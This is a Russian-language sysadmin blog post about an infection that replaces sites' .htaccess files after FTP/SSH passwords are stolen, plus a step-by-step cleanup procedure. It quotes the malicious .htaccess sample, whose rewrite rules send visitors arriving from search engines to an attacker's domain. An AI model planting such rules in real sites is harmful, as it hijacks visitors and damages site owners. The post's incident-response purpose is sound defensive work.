Ах да. Мануалы новые до релиза squeeze писать не буду. Also активно зарабатываю деньги на новый домен, поэтому времени вообще мало)

Собственно. Столкнулся с тем, что при переходе на сайты одного из пользователей подконтрольного мне сервера из поисковиков посетителей сайта редиректило черти куда. Домен второго уровня был staticcling.org (а вообще редиректило на третий домен отсюда с огромным линком после слеша).

Гадость известная. Подвержены этой гадость в первую очередь php-cgi+apache2. Тем не менее, модификации данного алгоритма подпортят жизнь и тем, кто использует mod_php.
Виндузятный пользователь методом трояноигнорирования дарит пароль от фтп или ssh неизвестным благодетелям. Благодетели после этого запускают скриптик, который:
1) удаляет все нативные (родные для сайта) .htaccess и кладет в /home/user/php-bin (или какой у вас там каталог с Handlerами пользователей) свой .htaccess или
2) удаляет все нативные .htaccess и кладет в каждый каталог свои. Или кладет один, но в корень сайта.

Примерное содержимое (сдернуто с форума ispsytem):
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*(aol|google|rambler|mail|yandex|bing|yahoo).*$ [NC]
RewriteRule .* http://clasquerastmi.staticcling.org/wstat/accepter.php?h=%{HTTP_HOST}&u=%REQUEST_URI}&f=2015549ca2aaeedc970d91a54aae40e3&d=2b8eef35baffd3bc19f6783535f3504d [R,L]

Порядок действий.
1) вычисляем все зараженные сайты на сервере
2) меняем пароли на ftp/sftp/ssh у всех аккаунтов, которые могли поиметь доступ к файлам пораженных сайтов
3) читаем /var/log/xferlog и ищем тех, кто трогал наши .htaccess
4) пишем на плохих дяденек абузу хостеру.
5) даём в тык хомякам, которые до сих пор хранят пароли на ftp/sftp в десктопных клиентах под виндой
6) даём им ещё раз в тык
7) заставляем вылечиться от трояна. Не даём им новые пароли, пока не будем уверены, что они вылечились.
8) делаем
grep -rn staticcling /blah/blah/where/your/website/files
от рута сразу.
9) делаем
grep -rn staticcling /home/user/data/php-bin
(в данном случае /home/user/data/php-bin стоит заменить на каталог, где валяется php-handler и юзверский php.ini для CGI, например:
host /home/user/data/php-bin # ls
php php.ini )
10) staticcling стоит заменить на любой кусок URLя, на который редиректит посетителей, если редиректит не на staticcling
На всякий случай делаем:
grep -rn staticcling /
когда нагрузка на сервер спадет в ночное время
11) удаляем все файлы, которые найдёт grep -rn, либо чистим их.
12) ищем и восстанавливаем оригинальные .htaccess

Собственно, данная вариация трояна — лишь пристрелочная. Редирект то даже идет на несуществующую страницу. Но стоит ожидать того, что редиректы будут уже на реально работающие сайты с клубничкой или варезом. При том с похожими доменами. Ну вы поняли зачем оно надо.